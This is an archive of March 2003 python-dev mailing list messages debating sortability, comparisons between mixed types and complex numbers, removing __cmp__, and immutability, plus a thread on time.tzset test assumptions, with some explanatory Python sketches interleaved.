> And the key assumption for sorting things is that
> the things are sortable, which means there
> exists an order on the basic set.
> Which again suggests that list elements usually
> have something in common.

If a list contains ONE complex number and no other number,
then the list can be sorted.

If the list contains elements that have something in common,
by both being complex numbers, then it cannot be sorted.

So, lists whose elements have LESS in common (by being of
widely different types) are more likely to be sortable than lists
some of whose elements have in common the fact of being
numbers (if one or more of those numbers are complex).

Although not likely to give practical problems (after all I suspect
most Pythonistas never use complex numbers at all), this
anomaly (introduced in 1.6, I think) makes conceptualization
less uniform and thus somewhat harder to teach.
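
A small sketch of the complex-number half of this, run on a current
Python 3 (an assumption; the thread is about 1.6 through 2.3). The
helper can_sort is made up for the example. Note that on Python 3 a
list mixing a complex number with strings is no longer sortable
either, unlike the 2.x behaviour described above:

```python
def can_sort(items):
    """Return True if sorted() accepts items, False if it raises TypeError."""
    try:
        sorted(items)
    except TypeError:
        return False
    return True


print(can_sort([3.0, 1, 2]))   # real numbers order fine
print(can_sort([1j]))          # one element: nothing is ever compared
print(can_sort([1j, 2j]))      # two complex numbers: < is not defined
print(can_sort([1j, 2.0]))     # complex next to any other number
```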


Alex


From guido@python.org  Sat Mar 15 12:14:50 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 15 Mar 2003 07:14:50 -0500
Subject: [Python-Dev] tzset
In-Reply-To: "Your message of Sat, 15 Mar 2003 17:34:26 +1100."
 <2ADB787D-56B0-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
References: <2ADB787D-56B0-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
Message-ID: <200303151214.h2FCEoH05946@pcp02138704pcs.reston01.va.comcast.net>

[Stuart]
> test_time.test_tzset should only be run if time.tzset is defined
> (which should only be there if configure determines that tzset works
> with the TZ formats we are testing). Feel like adding a clause at the
> top of test_tzset to skip the test if time.tzset is not defined, or
> should I submit a patch?

Done.

[Tim]
> > Now Windows does support tzset(), but not TZ values of the form
> > test_time.test_tzset() is testing, like
> >
> >                 environ['TZ'] = 'US/Eastern'
> > and
> >             environ['TZ'] = 'Australia/Melbourne'
> >
> > The rub here is that I haven't found *any* tzset man pages on the
> > web that claim TZ accepts such values (other than to silently
> > ignore them because
> 
> It specifies the pathname to a tzfile(5) format file, relative to
> an OS-defined default. From BSD:
>      If its value does not begin with a colon, it is first used as
>      the pathname of a file (as described above) from which to
>      read the time conversion information.  If that file cannot be
>      read, the value is then interpreted as a direct specification
>      (the format is described below) of the time conversion
>      information.
> Solaris has a similar definition. Linux documents this format as
> needing to start with a ':' but accepts it (at least I think I
> tested this...)
> 
> To me, this is the useful format as all the others require you to
> know your DST transition times rather than rely on the OS to supply them.
> At the moment if the 'path to a tzfile(5)' format is not accepted, your
> tzset(3) is considered broken and time.tzset not built.
> 
> I'm happy to rewrite the detection in configure.in and the test in
> test_time.py to lower the bar on this, but I think a better solution
> may be to determine if Windows has a format that lets us do DST
> calculations and keep the bar high. I was hoping that such a format
> would a) exist and b) Allow translation between the Unix standard of
> Country/Region to whatever-windows-uses.

Nevertheless I don't think that the standard definition for tzset()
defines which values will be accepted by a particular tzset
implementation.  So a test that relies on these is bound to fail on
some systems, not because tzset is broken, but because the test makes
unfair assumptions.  Perhaps you can rewrite the test to use only
standardized input forms?
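
For illustration, a sketch that sticks to the POSIX "std offset dst,
rule" form of TZ. The value below is the one used in the time module
documentation; the helper tzname_for is invented here, and the result
on a platform without time.tzset is simply None:

```python
import os
import time


def tzname_for(tz_value):
    """Return time.tzname with TZ set to tz_value, or None without tzset."""
    if not hasattr(time, "tzset"):
        return None
    saved = os.environ.get("TZ")
    try:
        os.environ["TZ"] = tz_value
        time.tzset()
        return time.tzname
    finally:
        # Put the process back the way we found it.
        if saved is None:
            os.environ.pop("TZ", None)
        else:
            os.environ["TZ"] = saved
        time.tzset()


# POSIX form: standard name, offset, DST name, then the transition rules.
names = tzname_for("EST+05EDT,M4.1.0,M10.5.0")
print(names)
```

A value like this spells out the DST rules itself, so it does not
depend on any tzfile being installed.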

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sat Mar 15 12:36:19 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 15 Mar 2003 07:36:19 -0500
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: "Your message of Sat, 15 Mar 2003 08:57:53 +0100."
 <200303150857.53214.aleax@aleax.it>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
Message-ID: <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>

> > > Sorting plays with mutability by working in-place, but for many
> > > uses it would be just as good if sorting returned a sorted copy
> > > instead -- the key thing here is the sorting, not the mutability.
> >
> > And the key assumption for sorting things is that
> > the things are sortable, which means there
> > exists an order on the basic set.
> > Which again suggests that list elements usually
> > have something in common.
> 
> If a list contains ONE complex number and no other number,
> then the list can be sorted.

But the order isn't meaningful.

> If the list contains elements that have something in common,
> by both being complex numbers, then it cannot be sorted.
> 
> So, lists whose elements have LESS in common (by being of
> widely different types) are more likely to be sortable than lists
> some of whose elements have in common the fact of being
> numbers (if one or more of those numbers are complex).
> 
> Although not likely to give practical problems (after all I suspect
> most Pythonistas never use complex numbers at all), this
> anomaly (introduced in 1.6, I think) makes conceptualization
> less uniform and thus somewhat harder to teach.

If I had to do it over again, I'd only implement == and != for objects
of vastly differing types, and limit <, <=, >, >= to objects that are
meaningfully comparable.

I'd like to do this in Python 3.0, but that probably means we'd have
to start deprecating default comparisons except (in)equality in Python
2.4.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From bbum@codefab.com  Sat Mar 15 13:46:19 2003
From: bbum@codefab.com (Bill Bumgarner)
Date: Sat, 15 Mar 2003 08:46:19 -0500
Subject: [Python-Dev] Mutability vs. Immutability (was Re: lists v. tuples)
In-Reply-To: <20030315063502.17965.17900.Mailman@mail.python.org>
Message-ID: <8068F74D-56EC-11D7-95E7-000393877AE4@codefab.com>

On Saturday, Mar 15, 2003, at 01:35 US/Eastern, 
python-dev-request@python.org wrote:
> This has its downside too though.  A function designed to take an
> immutable class instance cannot rely on the class instance to remain
> unchanged, because the caller could pass it an instance of the
> corresponding mutable subclass!  (For example, the function might use
> the argument as a dict key.)  In some sense this inheritance pattern
> breaks the "Liskov substitutability" principle: if B is a base class
> of C, whenever a B instance is expected, a C instance may be used.

In practice, this isn't an issue though it does require that the 
developer follow a couple of simple patterns.   Since Objective-C is a 
C derived language, requiring the developer to follow a couple of extra 
simple patterns isn't a big deal considering that the developer already 
has to deal with all of the really fun memory management issues 
associated with a pointer based language.

Namely, if your code takes an array-- for example-- and is going to 
hang on to the reference for a while and expect immutability, simply 
copy the array when storing it away:

- (void) setSearchPath: (NSArray *) anArray
{
     if (searchPath != anArray) {
          [searchPath release];
          searchPath = [anArray copy];
     }
}

If anArray is mutable, the invocation of -copy creates an immutable 
copy of the array without copying its contents.  If anArray is 
immutable, -copy simply returns the same array with the reference count 
bumped by one:

// NSArray implementation
- copy
{
     return [self retain];
}

Easy and efficient, as long as the developer remembers to follow the 
pattern....
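
A loose Python analogue of the same pattern, offered as a sketch and
not as anything Cocoa does: tuple() plays the role of -copy. The class
Finder and its method names are invented. That tuple() hands back the
very same object for an exact tuple is a CPython detail, so treat the
"no copy" half as an assumption about that implementation:

```python
class Finder:
    """Keeps a search path that the caller cannot mutate afterwards."""

    def __init__(self):
        self._search_path = ()

    def set_search_path(self, paths):
        # A list is copied into a new tuple; the elements are shared.
        self._search_path = tuple(paths)

    @property
    def search_path(self):
        return self._search_path


finder = Finder()
paths = ["/usr/lib", "/opt/lib"]
finder.set_search_path(paths)
paths.append("/tmp")            # later mutation by the caller
print(finder.search_path)       # the stored path is unaffected
```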

b.bum


From tismer@tismer.com  Sat Mar 15 15:59:19 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sat, 15 Mar 2003 16:59:19 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <200303150857.53214.aleax@aleax.it>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it>
Message-ID: <3E734DD7.3080105@tismer.com>

Alex Martelli wrote:
> On Friday 14 March 2003 04:42 pm, Christian Tismer wrote:
...

>>And the key assumption for sorting things is that
>>the things are sortable, which means there
>>exists an order on the basic set.
>>Which again suggests that list elements usually
>>have something in common.
> 
> If a list contains ONE complex number and no other number,
> then the list can be sorted.

By a similar argument, tuples of one element can be sorted
and reversed, just by doing nothing :-)

> If the list contains elements that have something in common,
> by both being complex numbers, then it cannot be sorted.

Sure it can, by supplying a compare function, which implements
the particular sorting operation that you want. Perhaps you
want to sort them by their abs value or something. (And then
you will probably want a stable sort, which we meanwhile
have, thanks to Tim:

 >>> a=[1, 2, 2+2j, 3+1j, 1+3j, 3-3j, 3+1j, 1+3j]
 >>> a.sort(lambda x, y:cmp(abs(x), abs(y)))
 >>> a
[1, 2, (2+2j), (3+1j), (1+3j), (3+1j), (1+3j), (3-3j)]
 >>>

)

Complex just has no total order, which makes it impossible to
provide a meaningful default ordering.
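
The session above uses the cmp-function form of list.sort(), which is
gone in Python 3. A sketch of the same sort on a current Python 3 (an
assumption, not what the thread ran), once with key=abs and once with
functools.cmp_to_key wrapping an old-style compare. The name
compare_abs is made up:

```python
import functools

a = [1, 2, 2+2j, 3+1j, 1+3j, 3-3j, 3+1j, 1+3j]


def compare_abs(x, y):
    """Old-style three-way compare on magnitude: negative, zero or positive."""
    return (abs(x) > abs(y)) - (abs(x) < abs(y))


by_key = sorted(a, key=abs)
by_cmp = sorted(a, key=functools.cmp_to_key(compare_abs))
print(by_key)
print(by_cmp == by_key)
```

Because the sort is stable, the elements of equal magnitude (3+1j and
1+3j) stay in their original relative order.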

> So, lists whose elements have LESS in common (by being of
> widely different types) are more likely to be sortable than lists
> some of whose elements have in common the fact of being
> numbers (if one or more of those numbers are complex).

I agree that my statement does not apply when putting
non-sortable things into a list. But I don't believe
that people are putting widely different types into
a list in order to sort them. (Although there is an
arbitrary order between strings and numbers, which
I would drop in Python 2.4, too).

chris


From tjreedy@udel.edu  Sat Mar 15 17:54:05 2003
From: tjreedy@udel.edu (Terry Reedy)
Date: Sat, 15 Mar 2003 12:54:05 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it> <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <b4vp23$vec$1@main.gmane.org>

"Guido van Rossum" <guido@python.org> wrote in message
news:200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net...
> But the order isn't meaningful.
....
> If I had to do it over again, I'd only implement == and != for objects
> of vastly differing types, and limit <, <=, >, >= to objects that are
> meaningfully comparable.

For user-defined types/classes, I presume that this would still mean
deferring to the appropriate magic method (__cmp__ or __ge__?) to
define 'meaningful'.

> I'd like to do this in Python 3.0, but that probably means we'd have
> to start deprecating default comparisons except (in)equality in
> Python 2.4.

+1, I think.

Based on reading c.l.py, the validity of nonsense comparisons is one of
the more surprising 'features' of Python for beginners -- who
reasonably expect a TypeError or ValueError.  Once they get past that,
they are then surprised by the instability across versions.  Given
that universal sorting of hetero-lists is now broken, I think it would
be better to do away with it cleanly.  It is seldom needed and would
still be available with a user-defined sorting function (which
requires some thought as to what is really wanted).  A Python version
of the present algorithm could be included (in Tools/xx perhaps) for
anyone who actually needs it.

Terry J. Reedy


From aleax@aleax.it  Sat Mar 15 18:07:35 2003
From: aleax@aleax.it (Alex Martelli)
Date: Sat, 15 Mar 2003 19:07:35 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <3E734DD7.3080105@tismer.com>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303150857.53214.aleax@aleax.it> <3E734DD7.3080105@tismer.com>
Message-ID: <200303151907.35471.aleax@aleax.it>

On Saturday 15 March 2003 04:59 pm, Christian Tismer wrote:
   ...
> Complex just has no total order, which makes it impossible to
> provide a meaningful default ordering.

Back in Python 1.5.2 times, the "impossible to provide" ordering
was there.  No more (and no less!) "meaningful" than, say,
comparisons between (e.g.) lists, numbers, strings and dicts,
which _are_ still provided as of Python 2.3.

> I agree that my statement does not apply when putting
> non-sortable things into a list. But I don't believe

A list containing ONE complex number and (e.g.) three
strings is sortable.  So, there are NO "non-sortable things".

A list is non-sortable (unless by providing a custom compare,
as you pointed out) if it contains a complex number and any
other number -- so, there _are_ "non-sortable LISTS" (unless
suitable custom compares are used), but still no "non-sortable
THINGS" in current Python.

> that people are putting widely different types into
> a list in order to sort them. (Although there is an
> arbitrary order between strings and numbers, which
> I would drop in Python 2.4, too).

Such a change would indeed enormously increase the
number of non-sortable (except by providing custom
compares) lists.  So, for example, all places which get
and sort the list of keys in a dictionary in order to return 
or display the keys should presumably do the sorting
within a try/except?  Or do you think a dictionary should
also be constrained to have keys that are all comparable
with each other (i.e., presumably, never both string AND
number keys) as well as hashable?

I fail to see how forbidding me to sort the list of keys of
any arbitrary dict will enhance my productivity in any way --
it's bad enough (in theory -- in practice it doesn't bite much
as complex numbers are used so rarely) with the complex
numbers thingy, why make it even worse by inventing a
novel "strings vs numbers" split?

Since when is Python about forbidding the user to do
quite normal things such as sorting the list of keys of
any arbitrary dictionary for more elegant display -- for
no practically useful purpose that I've ever seen offered,
in brisk violation of "practicality beats purity"?


Alex


From tismer@tismer.com  Sat Mar 15 19:50:33 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sat, 15 Mar 2003 20:50:33 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <200303151907.35471.aleax@aleax.it>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303150857.53214.aleax@aleax.it> <3E734DD7.3080105@tismer.com> <200303151907.35471.aleax@aleax.it>
Message-ID: <3E738409.4060500@tismer.com>

Alex Martelli wrote:
...

> A list containing ONE complex number and (e.g.) three
> strings is sortable.  So, there are NO "non-sortable things".

Quite an academical POV for a practical man like you.

> A list is non-sortable (unless by providing a custom compare,
> as you pointed out) if it contains a complex number and any
> other number -- so, there _are_ "non-sortable LISTS" (unless
> suitable custom compares are used), but still no "non-sortable
> THINGS" in current Python.

Don't understand: How is a tuple not a non-sortable
thing, unless I turn it into a list, which is not
a tuple? Or do you mean the complex, which refuses
to be sorted, unlike other objects, which don't
provide any ordering, and are ordered by ID?

[number/string comparison]

> Such a change would indeed enormously increase the
> number of non-sortable (except by providing custom
> compares) lists.

Theoretical lists, or those existing in real
applications? For the latter, mixing ints and
strings was most often a programming error
in my past.

> So, for example, all places which get
> and sort the list of keys in a dictionary in order to return 
> or display the keys should presumably do the sorting
> within a try/except?  Or do you think a dictionary should
> also be constrained to have keys that are all comparable
> with each other (i.e., presumably, never both string AND
> number keys) as well as hashable?

I would like to have sub-classes of dictionaries, which
protect me from putting keys into them which I didn't
intend to. But that doesn't mean that I want to
forbid it once and forever.
Concerning general dicts, you are right, sorting the keys
makes sense to get them into some arbitrary order.

> I fail to see how forbidding me to sort the list of keys of
> any arbitrary dict will enhance my productivity in any way --

I thought it would catch the cases where you failed to build
a key of the intended type. Maybe this is worse than what we
have now, tho. I have to say that this wasn't the point of my
message, so I don't care to discuss it.

...

> Since when is Python about forbidding the user to do
> quite normal things such as sorting the list of keys of
> any arbitrary dictionary for more elegant display -- for
> no practically useful purpose that I've ever seen offered,
> in brisk violation of "practicality beats purity"?

Well, I just don't like such an arbitrary thing, that a
string is always bigger than an int. Since we don't allow
them to use as each other by coercion, we also should not
compare them. Bean counts are bean counts, and names are names.
One could go the AWK way, where ints and strings were converted
whenever necessary, but that would be even worse.
Maybe the way Python handles it is not so bad. But then it
should be consistent and at least move complex objects
into their own group in the sorted array, maybe just not
sorting themselves.

Anyway, this would also not increase your/my productivity
in any way, so let's get back to real problems.

ciao - chris


From guido@python.org  Sat Mar 15 22:45:34 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 15 Mar 2003 17:45:34 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: "Your message of Sat, 15 Mar 2003 12:54:05 EST."
 <b4vp23$vec$1@main.gmane.org>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
Message-ID: <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>

[Terry Reedy]
> For user-defined types/classes, I presume that this would still mean
> deferring to the appropriate magic method (__cmp__ or __ge__?) to
> define 'meaningful'.

Yes.  And I'm still hoping to remove __cmp__; there should be only one
way to overload comparisons.
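
A sketch of what overloading only through the rich comparison methods
looks like on a current Python 3, where __cmp__ is no longer consulted
(an assumption about the reader's interpreter, not about 2.3). The
class Version is invented; functools.total_ordering fills in the
remaining operators from __eq__ and __lt__:

```python
import functools


@functools.total_ordering
class Version:
    """Hypothetical value type that only orders against its own kind."""

    def __init__(self, major, minor):
        self.major = major
        self.minor = minor

    def _key(self):
        return (self.major, self.minor)

    def __eq__(self, other):
        if not isinstance(other, Version):
            return NotImplemented      # falls back to "not equal"
        return self._key() == other._key()

    def __lt__(self, other):
        if not isinstance(other, Version):
            return NotImplemented      # Python then raises TypeError
        return self._key() < other._key()

    def __hash__(self):
        return hash(self._key())


print(Version(1, 2) < Version(1, 3))
print(Version(1, 2) == "1.2")
```

Returning NotImplemented is what lets the class decide which
comparisons are 'meaningful': equality with a foreign type quietly
answers False, while ordering against it ends in a TypeError.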

> > I'd like to do this in Python 3.0, but that probably means we'd have
> > to start deprecating default comparisons except (in)equality in
> > Python 2.4.
> 
> +1, I think.
> 
> Based on reading c.l.py, the validity of nonsense comparisons is one of
> the more surprising 'features' of Python for beginners -- who
> reasonably expect a TypeError or ValueError.  Once they get past that,
> they are then surprised by the instability across versions.  Given
> that universal sorting of hetero-lists is now broken, I think it would
> be better to do away with it cleanly.  It is seldom needed and would
> still be available with a user-defined sorting function (which
> requires some thought as to what is really wanted).

Exactly.

> A Python version of the present algorithm could be included (in
> Tools/xx perhaps) for anyone who actually needs it.

I doubt there will be many takers.  Let people make up their own
version, so they know its behavior.
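
One possible home-made version, as a sketch only: group the items by
type name, sort each group naturally, and fall back to repr() where a
group cannot be ordered. The function display_order and this
particular policy are made up here; they are not the algorithm the
interpreter used:

```python
def display_order(keys):
    """Order arbitrary keys for display: by type name, then within the type."""
    groups = {}
    for key in keys:
        groups.setdefault(type(key).__name__, []).append(key)

    ordered = []
    for type_name in sorted(groups):
        group = groups[type_name]
        try:
            group = sorted(group)            # natural order where it exists
        except TypeError:
            group = sorted(group, key=repr)  # e.g. several complex numbers
        ordered.extend(group)
    return ordered


mixed = {"b": 1, 2: 2, "a": 3, 10: 4, 1j: 5}
print(display_order(mixed))
```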

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sat Mar 15 22:43:10 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 15 Mar 2003 17:43:10 -0500
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: "Your message of Sat, 15 Mar 2003 19:07:35 +0100."
 <200303151907.35471.aleax@aleax.it>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303150857.53214.aleax@aleax.it> <3E734DD7.3080105@tismer.com>
 <200303151907.35471.aleax@aleax.it>
Message-ID: <200303152243.h2FMhA706558@pcp02138704pcs.reston01.va.comcast.net>

[Christian Tismer]
> > that people are putting widely different types into
> > a list in order to sort them. (Although there is an
> > arbitrary order between strings and numbers, which
> > I would drop in Python 2.4, too).

[Alex Martelli]
> Such a change would indeed enormously increase the
> number of non-sortable (except by providing custom
> compares) lists.  So, for example, all places which get
> and sort the list of keys in a dictionary in order to return 
> or display the keys should presumably do the sorting
> within a try/except?

I don't believe this argument.  I've indeed often sorted a dict's keys
(or values), but always in situations where the sorted values were
homogeneous as far as meaningful comparison goes, e.g. all numbers, or
all strings, or all "compatible" tuples.

> Or do you think a dictionary should also be constrained to have keys
> that are all comparable with each other (i.e., presumably, never
> both string AND number keys) as well as hashable?

If you know *nothing* about the keys of a dict, you already have to do
that if you want to sort the keys.

There are lots of apps that have no need to ever sort the keys: if
there weren't, it would have been wiser to keep the keys in sorted
order in the first place, like ABC did.

> I fail to see how forbidding me to sort the list of keys of
> any arbitrary dict will enhance my productivity in any way --
> it's bad enough (in theory -- in practice it doesn't bite much
> as complex numbers are used so rarely) with the complex
> numbers thingy, why make it even worse by inventing a
> novel "strings vs numbers" split?

To the contrary, I don't see how it will reduce your productivity.

You seem to be focusing on the wrong thing (sorting dict keys).  The
right thing to consider here is that "a < b" should only work if a and
b can be meaningfully ordered, just like "a + b" only works if a and b
can be meaningfully added.

> Since when is Python about forbidding the user to do
> quite normal things such as sorting the list of keys of
> any arbitrary dictionary for more elegant display -- for
> no practically useful purpose that I've ever seen offered,
> in brisk violation of "practicality beats purity"?

I doubt that elegant display of a dictionary with wildly incompatible
keys is high on anybody's list of use cases.  On the other hand, I'm
sure that raising an exception on abominations like 2 < "1" or
(1, 2) < 0 is a good thing, just like we all agree that forbidding
1 + "2" is a good thing.

Of course, == and != will continue to accept objects of incongruous
types -- these will simply be considered unequal.  That's the
cornerstone of dictionaries, and I see no reason to change this --
while I don't know whether 1 ought to be considered less than or
greater than 1j, I damn well know they aren't equal!
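
For what it is worth, a sketch of how these cases come out on a
current Python 3, which is an assumption about the interpreter and
says nothing about 2.3. The helper outcome is invented; it just turns
a TypeError into a string so the results can be tabulated:

```python
def outcome(operation):
    """Run operation() and report its value, or 'TypeError' if it raises one."""
    try:
        return operation()
    except TypeError:
        return "TypeError"


results = {
    '2 < "1"': outcome(lambda: 2 < "1"),
    "(1, 2) < 0": outcome(lambda: (1, 2) < 0),
    '1 + "2"': outcome(lambda: 1 + "2"),
    '1 == "1"': outcome(lambda: 1 == "1"),
    "1 == 1j": outcome(lambda: 1 == 1j),
    "1 < 1j": outcome(lambda: 1 < 1j),
}
for expression, value in results.items():
    print(expression, "->", value)
```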

(And I'm specifically excluding gray areas like comparing tuples and
lists.  Given that (a, b) = [1, 2] now works, as does [].extend(()),
it might be better to allow comparing tuples to lists, and even
consider them equal if they have the same length and their items
compare equal pairwise.  This despite my position about the different
idiomatic uses of the two types.  And so the circle closes [see
Subject]. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From ark@research.att.com  Sat Mar 15 23:44:36 2003
From: ark@research.att.com (Andrew Koenig)
Date: 15 Mar 2003 18:44:36 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
 <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <yu99adfw5h5n.fsf@europa.research.att.com>

Guido> Yes.  And I'm still hoping to remove __cmp__; there should be
Guido> only one way to overload comparisons.

Moreover, for some data structures, the __cmp__ approach can be
expensive.  For example, if you're comparing sequences of any kind,
and you know that the comparison is for == or !=, you have your answer
immediately if the sequences differ in length.  If you don't know
what's being tested, as you wouldn't inside __cmp__, you may spend a
lot more time to obtain a result that will be thrown away.
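
A minimal sketch of that cost difference, assuming a toy sequence class
(Seq, three_way and item_compares are hypothetical names, not an existing
API).  The equality test can answer from the lengths alone; the three-way
routine cannot know that only equality was wanted, so it walks the items.

```python
class Seq:
    """Toy sequence that counts how many item comparisons it performs."""

    def __init__(self, items):
        self.items = list(items)
        self.item_compares = 0

    def __eq__(self, other):
        if not isinstance(other, Seq):
            return NotImplemented
        if len(self.items) != len(other.items):
            return False               # answer known without touching items
        for x, y in zip(self.items, other.items):
            self.item_compares += 1
            if x != y:
                return False
        return True

    def three_way(self, other):
        """Stand-in for __cmp__: returns -1, 0 or 1."""
        for x, y in zip(self.items, other.items):
            self.item_compares += 1
            if x != y:
                return -1 if x < y else 1
        return (len(self.items) > len(other.items)) - (
            len(self.items) < len(other.items))


a, b = Seq(range(1000)), Seq(range(1001))
print(a == b, a.item_compares)            # no item comparisons needed
print(a.three_way(b), a.item_compares)    # walks the whole common prefix
```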

-- 
Andrew Koenig, ark@research.att.com, http://www.research.att.com/info/ark


From glyph@twistedmatrix.com  Sun Mar 16 04:19:30 2003
From: glyph@twistedmatrix.com (Glyph Lefkowitz)
Date: Sat, 15 Mar 2003 22:19:30 -0600
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <20030315063502.17965.57753.Mailman@mail.python.org>
Message-ID: <7BFB4526-5766-11D7-806A-000393C9700E@twistedmatrix.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Saturday, March 15, 2003, at 12:35 AM, python-dev-request@python.org 
wrote:

> Then I realize that C++ has exactly this feature (it's called "const"),
> and that I find it to be an annoyance far more often than I find it
> handy. And I begin to question.

I have thought about this as well; I think that the problem is that in 
C++, you have to declare "const" *everywhere* -- you can't just pass a 
mutable data structure and have the "right thing" happen the way it 
most obviously should.  Arguably when one is mucking about at such a 
low level as is common in C++, this is something that you have to be 
really careful about, but I still think that it's handled badly in the 
syntax.

Imagine for a moment that dictionaries and lists in Python had a 
"const" method which would immutabilify them (if that's even a word).  
The following example:

>> const char* strrev(const char* torev) {
>> 	// reverse the string
>> }
>> ...
>> 	char* x = "1234";
>> 	char* y = (char*) strrev((const char*)x); // tell me I've been bad, g++!
>> ...

As opposed to:

>> def strrev(s):
>>     "Please pass me immutable data!"
>>     # reverse the string
>> ...
>> 	x = '1234'
>> 	y = strrev(x.const()).copy()
>> ...

I think that the latter is far less likely to annoy.  Of course, in 
this hypothetical example, I can design all kinds of convenient 
behavior for these Python mutability operations to have, like 'copy' 
always returning a mutable shallow copy of the data structure in 
question, and '.const()' making an object immutable and then returning 
'self'...
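
A rough sketch of how such a hypothetical const()/copy() pair might behave,
written as a list subclass.  ConstableList is an invented name, and only
two mutating methods are guarded here; a complete version would have to
guard every one of them.

```python
class ConstableList(list):
    """List with a hypothetical const() method, as imagined above."""

    _frozen = False

    def const(self):
        """Make this object immutable and return it."""
        self._frozen = True
        return self

    def copy(self):
        """Always return a new, mutable, shallow copy."""
        return ConstableList(self)

    def _guard(self):
        if self._frozen:
            raise TypeError("list is const")

    def append(self, item):
        self._guard()
        super().append(item)

    def __setitem__(self, index, value):
        self._guard()
        super().__setitem__(index, value)


def strrev(s):
    "Please pass me immutable data!"
    return ConstableList(reversed(s)).const()


x = ConstableList("1234")
y = strrev(x.const()).copy()
y.append("0")                  # fine: the copy is mutable again
print(y)
```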

This smells like another unformed PEP I don't have the time to think 
about or implement :-(, but I would definitely like to see mutability 
guarantees worm their way into the language at some point, too.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (Darwin)

iD8DBQE+c/tWvVGR4uSOE2wRAmeoAJ9tSOYOKTCxcl6Aj6reelmFU8OafwCggcNY
smKTK1+HRCCEC9Pl/mhE4cI=
=cMYA
-----END PGP SIGNATURE-----


From tim.one@comcast.net  Sun Mar 16 04:36:28 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 15 Mar 2003 23:36:28 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEECEBAB.tim.one@comcast.net>

[Guido]
> Yes.  And I'm still hoping to remove __cmp__; there should be only one
> way to overload comparisons.

As long as we're going to break everyone's code, list.sort(f) should also be
redefined then so that f returns a Boolean, f(a, b) meaning a is less than
b.  list.sort()'s implementation uses only less-than already, and it seems
that all newcomers to Python who didn't come by way of C or Perl (same thing
in this respect <wink>) expect sort's comparison function to work that way.
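
A sketch of what sorting with a Boolean less-than function could look like,
assuming a later Python in which sorted() relies only on "<" between the
objects it is handed.  sort_by_less and Key are hypothetical names.

```python
def sort_by_less(items, less):
    """Return a sorted copy of items, where less(a, b) means a < b."""

    class Key:
        def __init__(self, value):
            self.value = value

        def __lt__(self, other):
            # The only comparison the sort ever asks for.
            return less(self.value, other.value)

    return [k.value for k in sorted(Key(v) for v in items)]


words = ["pear", "fig", "banana"]
print(sort_by_less(words, lambda a, b: len(a) < len(b)))
```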


From tim.one@comcast.net  Sun Mar 16 05:07:47 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 16 Mar 2003 00:07:47 -0500
Subject: [Python-Dev] tzset
In-Reply-To: <Pine.SOL.4.53.0303142237290.4751@death.OCF.Berkeley.EDU>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEDEBAB.tim.one@comcast.net>

[Brett Cannon]
> If there is one thing I have learned from writing _strptime is that you
> cannot be strict in the slightest for your input when it comes to
> time-based data.  I think this is another case where you need to be loose
> about input and strict with output.

Python doesn't do anything with TZ's value -- it doesn't even look to see
whether TZ is set, let alone parse it (well, Python's obsolete tzparse
module parses TZ's value, but the new code in question does not).

The cross-platform semantics of TZ are a joke.  The tests we have rely on
non-standard extensions (viewing POSIX as the only definitive std here).
Even if they stuffed colons at the front, POSIX leaves the interpretation of
colon-initiated TZ values entirely up to the implementation:

    If TZ is of the first format (that is, if the first character is a
    colon), the characters following the colon are handled in an
    implementation-defined manner.

